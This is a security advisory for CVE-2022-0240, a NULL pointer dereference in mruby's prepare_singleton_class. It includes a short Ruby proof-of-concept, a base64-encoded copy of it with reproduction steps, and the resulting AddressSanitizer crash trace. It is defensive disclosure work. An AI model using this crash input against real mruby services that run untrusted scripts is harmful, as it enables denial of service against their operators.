Headline
CVE-2022-0240: NULL Pointer Dereference in mruby
mruby is vulnerable to NULL Pointer Dereference
Description
There is a NULL Pointer Dereference in prepare_singleton_class
(src/class.c:360:13
). This bug has been found on mruby lastest commit (hash 171d32c0071d776207174a40a8fa26def3dbb931
) on Ubuntu 20.04 for x86_64/amd64.
Proof of Concept
1.times{b={}
a=0
[**0,m:0]
c={0=>0,nil=>nil}[0]
def m()end
def c.e()end}
Steps to reproduce
1- Clone repo and build with ASAN using MRUBY_CONFIG=build_config/clang-asan.rb rake
2- Use mruby to execute the poc:
$ echo -ne "MS50aW1lc3tiPXt9CmE9MApbKiowLG06MF0KYz17MD0+MCxuaWw9Pm5pbH1bMF0KZGVmIG0oKWVuZApkZWYgYy5lKCllbmR9Cg==" | base64 -d > poc
$ build/host/bin/mruby ./poc
/home/octa/mruby/src/class.c:360:13: runtime error: member access within null pointer of type 'struct RClass'
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior /home/octa/mruby/src/class.c:360:13 in
AddressSanitizer:DEADLYSIGNAL
=================================================================
==31695==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000010 (pc 0x0000005270f8 bp 0x7ffec6a14090 sp 0x7ffec6a13d80 T0)
==31695==The signal is caused by a READ memory access.
==31695==Hint: address points to the zero page.
#0 0x5270f8 in prepare_singleton_class /home/octa/mruby/src/class.c:360:13
#1 0x52688f in mrb_singleton_class_ptr /home/octa/mruby/src/class.c:1685:3
#2 0x528785 in mrb_singleton_class /home/octa/mruby/src/class.c:1692:22
#3 0x600757 in mrb_vm_exec /home/octa/mruby/src/vm.c:2918:17
#4 0x566ee9 in mrb_vm_run /home/octa/mruby/src/vm.c:1128:12
#5 0x55c339 in mrb_top_run /home/octa/mruby/src/vm.c:3050:12
#6 0x88b6ce in mrb_load_exec /home/octa/mruby/mrbgems/mruby-compiler/core/parse.y:6882:7
#7 0x88d2dc in mrb_load_detect_file_cxt /home/octa/mruby/mrbgems/mruby-compiler/core/parse.y:6925:12
#8 0x4c9118 in main /home/octa/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:347:11
#9 0x7f46ef9450b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
#10 0x41d82d in _start (/home/octa/mruby/build/host/bin/mruby+0x41d82d)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/octa/mruby/src/class.c:360:13 in prepare_singleton_class
==31695==ABORTING
Acknowledgements
This bug was found by Octavio Gianatiempo ([email protected]) and Octavio Galland ([email protected]) from Faraday Research Team.